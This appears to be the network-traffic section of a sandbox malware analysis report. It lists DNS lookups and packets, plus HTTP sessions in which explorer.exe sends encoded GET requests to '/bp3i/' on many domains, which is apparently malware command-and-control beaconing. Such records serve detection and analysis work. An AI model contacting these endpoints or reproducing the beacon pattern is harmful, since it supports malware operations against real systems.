Jun 22, 2021 18:25:34.017316103 CEST | 80 | 49746 | 67.199.248.12 | 192.168.2.5
Jun 22, 2021 18:25:34.017632961 CEST | 49746 | 80 | 192.168.2.5 | 67.199.248.12
Jun 22, 2021 18:25:34.017674923 CEST | 49746 | 80 | 192.168.2.5 | 67.199.248.12
Jun 22, 2021 18:25:34.069250107 CEST | 80 | 49746 | 67.199.248.12 | 192.168.2.5
Jun 22, 2021 18:25:44.579380035 CEST | 49749 | 80 | 192.168.2.5 | 50.87.146.99
Jun 22, 2021 18:25:44.760284901 CEST | 80 | 49749 | 50.87.146.99 | 192.168.2.5
Jun 22, 2021 18:25:44.760457993 CEST | 49749 | 80 | 192.168.2.5 | 50.87.146.99
Jun 22, 2021 18:25:44.760615110 CEST | 49749 | 80 | 192.168.2.5 | 50.87.146.99
Jun 22, 2021 18:25:44.941190004 CEST | 80 | 49749 | 50.87.146.99 | 192.168.2.5
Jun 22, 2021 18:25:44.979393005 CEST | 80 | 49749 | 50.87.146.99 | 192.168.2.5
Jun 22, 2021 18:25:44.979692936 CEST | 49749 | 80 | 192.168.2.5 | 50.87.146.99
Jun 22, 2021 18:25:44.980089903 CEST | 80 | 49749 | 50.87.146.99 | 192.168.2.5
Jun 22, 2021 18:25:44.980204105 CEST | 49749 | 80 | 192.168.2.5 | 50.87.146.99
Jun 22, 2021 18:25:45.160393000 CEST | 80 | 49749 | 50.87.146.99 | 192.168.2.5
Jun 22, 2021 18:25:50.065499067 CEST | 49750 | 80 | 192.168.2.5 | 23.225.101.32
Jun 22, 2021 18:25:50.296199083 CEST | 80 | 49750 | 23.225.101.32 | 192.168.2.5
Jun 22, 2021 18:25:50.296382904 CEST | 49750 | 80 | 192.168.2.5 | 23.225.101.32
Jun 22, 2021 18:25:50.296525002 CEST | 49750 | 80 | 192.168.2.5 | 23.225.101.32
Jun 22, 2021 18:25:50.530720949 CEST | 80 | 49750 | 23.225.101.32 | 192.168.2.5
Jun 22, 2021 18:25:50.531052113 CEST | 49750 | 80 | 192.168.2.5 | 23.225.101.32
Jun 22, 2021 18:25:50.761837959 CEST | 80 | 49750 | 23.225.101.32 | 192.168.2.5
Jun 22, 2021 18:25:50.761857986 CEST | 80 | 49750 | 23.225.101.32 | 192.168.2.5
Jun 22, 2021 18:25:50.762094021 CEST | 49750 | 80 | 192.168.2.5 | 23.225.101.32
                                                                                                                  Jun 22, 2021 18:25:55.638763905 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.695979118 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.696079969 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.696207047 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.754239082 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.754271030 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.754472017 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.754544973 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.811793089 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:00.855860949 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.056698084 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.056828022 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.057169914 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.257514954 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285360098 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285407066 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285660982 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.286010981 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.486409903 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.386672974 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.429472923 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.429666996 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.429832935 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.474116087 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.571907043 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.571934938 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.572149992 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.572212934 CEST4975380192.168.2.534.102.136.180

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 22, 2021 18:23:54.764163017 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:54.812222958 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:54.823451996 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:54.892064095 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:55.027213097 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:55.041273117 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:55.094613075 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:55.095175982 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:55.235524893 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:55.286159039 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:55.665152073 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:55.716680050 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:56.582766056 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:56.640352964 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:57.512614012 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:57.571700096 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:57.823247910 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:57.884458065 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:58.493119001 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:58.545609951 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:23:59.475248098 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:23:59.531183004 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:00.639548063 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:00.691658020 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:01.593386889 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:01.653599977 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:02.567322016 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:02.619290113 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:03.765702009 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:03.819284916 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:04.694814920 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:04.745690107 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:05.693505049 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:05.750416040 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:21.213641882 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:21.274754047 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:35.263587952 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:35.319888115 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:24:51.343915939 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:24:51.405790091 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:05.819411039 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:05.889704943 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:10.909509897 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:11.215209961 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:12.875679016 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:12.937540054 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:16.629293919 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:17.239247084 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:21.113866091 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:21.120426893 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:21.174793005 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:21.189177990 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:21.917556047 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:21.979103088 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:22.652049065 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:22.720386028 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:22.827163935 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:23.177216053 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:23.446938992 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:23.506237030 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:24.219727993 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:24.281904936 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:25.119163036 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:25.182950974 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:26.132370949 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:26.194438934 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:27.594022989 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:27.647409916 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:28.505049944 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:28.584403992 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:28.982712984 CEST | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:29.044420004 CEST | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:29.632641077 CEST | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:29.692975044 CEST | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:33.726090908 CEST | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:33.812124968 CEST | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:36.458223104 CEST | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:36.520037889 CEST | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:39.055846930 CEST | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:39.366209030 CEST | 53 | 61004 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:39.867213011 CEST | 56895 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:39.925975084 CEST | 53 | 56895 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:44.382913113 CEST | 62372 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:44.578063011 CEST | 53 | 62372 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:49.992361069 CEST | 61515 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:50.063656092 CEST | 53 | 61515 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:25:55.564214945 CEST | 56675 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:25:55.637794018 CEST | 53 | 56675 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:26:00.782303095 CEST | 57172 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:26:00.854792118 CEST | 53 | 57172 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:26:06.311050892 CEST | 55267 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:26:06.384546041 CEST | 53 | 55267 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:26:11.586018085 CEST | 50969 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:26:11.956522942 CEST | 53 | 50969 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:26:17.334999084 CEST | 64362 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:26:17.406371117 CEST | 53 | 64362 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:26:27.430978060 CEST | 54766 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:26:27.493675947 CEST | 53 | 54766 | 8.8.8.8 | 192.168.2.5
Jun 22, 2021 18:26:33.086693048 CEST | 61446 | 53 | 192.168.2.5 | 8.8.8.8
Jun 22, 2021 18:26:33.159524918 CEST | 53 | 61446 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 22, 2021 18:25:05.819411039 CEST | 192.168.2.5 | 8.8.8.8 | 0x3bf8 | Standard query (0) | www.reufhroir.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:10.909509897 CEST | 192.168.2.5 | 8.8.8.8 | 0xf2a2 | Standard query (0) | www.purpleqube.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:16.629293919 CEST | 192.168.2.5 | 8.8.8.8 | 0x47b1 | Standard query (0) | www.tori2020.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:22.827163935 CEST | 192.168.2.5 | 8.8.8.8 | 0x6b10 | Standard query (0) | www.underce.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:28.505049944 CEST | 192.168.2.5 | 8.8.8.8 | 0x92ea | Standard query (0) | www.fredrika-stahl.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:33.726090908 CEST | 192.168.2.5 | 8.8.8.8 | 0xa6bf | Standard query (0) | www.doodstore.net | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:39.055846930 CEST | 192.168.2.5 | 8.8.8.8 | 0x732 | Standard query (0) | www.kocaelimanliftkiralama.site | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:44.382913113 CEST | 192.168.2.5 | 8.8.8.8 | 0x2986 | Standard query (0) | www.mutanterestaurante.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:49.992361069 CEST | 192.168.2.5 | 8.8.8.8 | 0xf247 | Standard query (0) | www.9wsc.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:55.564214945 CEST | 192.168.2.5 | 8.8.8.8 | 0x660 | Standard query (0) | www.5xlsteve.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:00.782303095 CEST | 192.168.2.5 | 8.8.8.8 | 0x6b35 | Standard query (0) | www.oceancollaborative.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:06.311050892 CEST | 192.168.2.5 | 8.8.8.8 | 0x7360 | Standard query (0) | www.motivactivewear.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:11.586018085 CEST | 192.168.2.5 | 8.8.8.8 | 0x4f71 | Standard query (0) | www.grpsexportsandimports.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:17.334999084 CEST | 192.168.2.5 | 8.8.8.8 | 0xaa31 | Standard query (0) | www.kesat-ya10.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:27.430978060 CEST | 192.168.2.5 | 8.8.8.8 | 0x7483 | Standard query (0) | www.shenghui118.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:33.086693048 CEST | 192.168.2.5 | 8.8.8.8 | 0x4106 | Standard query (0) | www.reufhroir.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 22, 2021 18:25:05.889704943 CEST | 8.8.8.8 | 192.168.2.5 | 0x3bf8 | Name error (3) | www.reufhroir.com | none | none | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:11.215209961 CEST | 8.8.8.8 | 192.168.2.5 | 0xf2a2 | No error (0) | www.purpleqube.com | purpleqube.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:11.215209961 CEST | 8.8.8.8 | 192.168.2.5 | 0xf2a2 | No error (0) | purpleqube.com | | 119.81.95.146 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:17.239247084 CEST | 8.8.8.8 | 192.168.2.5 | 0x47b1 | No error (0) | www.tori2020.com | | 222.239.248.209 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:23.177216053 CEST | 8.8.8.8 | 192.168.2.5 | 0x6b10 | No error (0) | www.underce.com | vallble01.xshoppy.shop | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:23.177216053 CEST | 8.8.8.8 | 192.168.2.5 | 0x6b10 | No error (0) | vallble01.xshoppy.shop | | 75.2.124.199 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:28.584403992 CEST | 8.8.8.8 | 192.168.2.5 | 0x92ea | No error (0) | www.fredrika-stahl.com | | 185.53.177.12 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:33.812124968 CEST | 8.8.8.8 | 192.168.2.5 | 0xa6bf | No error (0) | www.doodstore.net | doodstore.net | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:33.812124968 CEST | 8.8.8.8 | 192.168.2.5 | 0xa6bf | No error (0) | doodstore.net | | 67.199.248.12 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:33.812124968 CEST | 8.8.8.8 | 192.168.2.5 | 0xa6bf | No error (0) | doodstore.net | | 67.199.248.13 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:39.366209030 CEST | 8.8.8.8 | 192.168.2.5 | 0x732 | Server failure (2) | www.kocaelimanliftkiralama.site | none | none | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:44.578063011 CEST | 8.8.8.8 | 192.168.2.5 | 0x2986 | No error (0) | www.mutanterestaurante.com | mutanterestaurante.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:44.578063011 CEST | 8.8.8.8 | 192.168.2.5 | 0x2986 | No error (0) | mutanterestaurante.com | | 50.87.146.99 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:50.063656092 CEST | 8.8.8.8 | 192.168.2.5 | 0xf247 | No error (0) | www.9wsc.com | | 23.225.101.32 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:55.637794018 CEST | 8.8.8.8 | 192.168.2.5 | 0x660 | No error (0) | www.5xlsteve.com | | 94.136.40.51 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:00.854792118 CEST | 8.8.8.8 | 192.168.2.5 | 0x6b35 | No error (0) | www.oceancollaborative.com | oceancollaborative.com | | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:26:00.854792118 CEST | 8.8.8.8 | 192.168.2.5 | 0x6b35 | No error (0) | oceancollaborative.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:06.384546041 CEST | 8.8.8.8 | 192.168.2.5 | 0x7360 | No error (0) | www.motivactivewear.com | motivactivewear.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST8.8.8.8192.168.2.50x7360No error (0)motivactivewear.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:11.956522942 CEST8.8.8.8192.168.2.50x4f71No error (0)www.grpsexportsandimports.com52.74.134.26A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:17.406371117 CEST8.8.8.8192.168.2.50xaa31Name error (3)www.kesat-ya10.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:27.493675947 CEST8.8.8.8192.168.2.50x7483No error (0)www.shenghui118.com45.192.104.89A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:33.159524918 CEST8.8.8.8192.168.2.50x4106Name error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)

HTTP Request Dependency Graph

• www.purpleqube.com
• www.tori2020.com
• www.underce.com
• www.fredrika-stahl.com
• www.doodstore.net
• www.mutanterestaurante.com
• www.9wsc.com
• www.5xlsteve.com
• www.oceancollaborative.com
• www.motivactivewear.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49726 | 119.81.95.146 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:11.419150114 CEST | 1542 | OUT | GET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1
Host: www.purpleqube.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:11.619210958 CEST | 1543 | IN | HTTP/1.1 302 Found
Date: Tue, 22 Jun 2021 16:25:11 GMT
Server: Apache
Location: https://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&amp;ApZx=O2MHiVr0W">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49732 | 222.239.248.209 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:17.506963015 CEST | 7114 | OUT | GET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1
Host: www.tori2020.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:17.774080992 CEST | 7115 | IN | HTTP/1.1 404 Not Found
Date: Tue, 22 Jun 2021 16:25:18 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /bp3i/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49737 | 75.2.124.199 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:23.221652031 CEST | 9032 | OUT | GET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1
Host: www.underce.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:23.498655081 CEST | 9034 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Tue, 22 Jun 2021 16:25:23 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.underce.com/bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49743 | 185.53.177.12 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:28.670067072 CEST | 9623 | OUT | GET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1
Host: www.fredrika-stahl.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:28.712451935 CEST | 9624 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 22 Jun 2021 16:25:28 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49746 | 67.199.248.12 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:33.868663073 CEST | 9713 | OUT | GET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1
Host: www.doodstore.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:34.017278910 CEST | 9714 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Tue, 22 Jun 2021 16:25:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Set-Cookie: anon_u=cHN1X18wN2Y4NzA5Yi1jODFjLTRiMmMtYmZkNC05NTUzOGIxZWNiZTI=|1624379133|145dbdce4dcc0b7ea9e772ebe809527624e89d4e; Domain=bitly.com; expires=Sun, 19 Dec 2021 16:25:33 GMT; httponly; Path=/; secure
Strict-Transport-Security: max-age=1209600
Location: https://bitly.com/pages/landing/branded-short-domains-powered-by-bitly?bsd=doodstore.net
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Frame-Options: DENY
P3p: CP="CAO PSA OUR"
Via: 1.1 google
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49749 | 50.87.146.99 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:44.760615110 CEST | 9748 | OUT | GET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1
Host: www.mutanterestaurante.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:44.979393005 CEST | 9749 | IN | HTTP/1.1 404 Not Found
Date: Tue, 22 Jun 2021 16:25:44 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Sat, 30 Nov 2019 02:37:20 GMT
Accept-Ranges: bytes
Content-Length: 746
Vary: Accept-Encoding
Content-Type: text/html
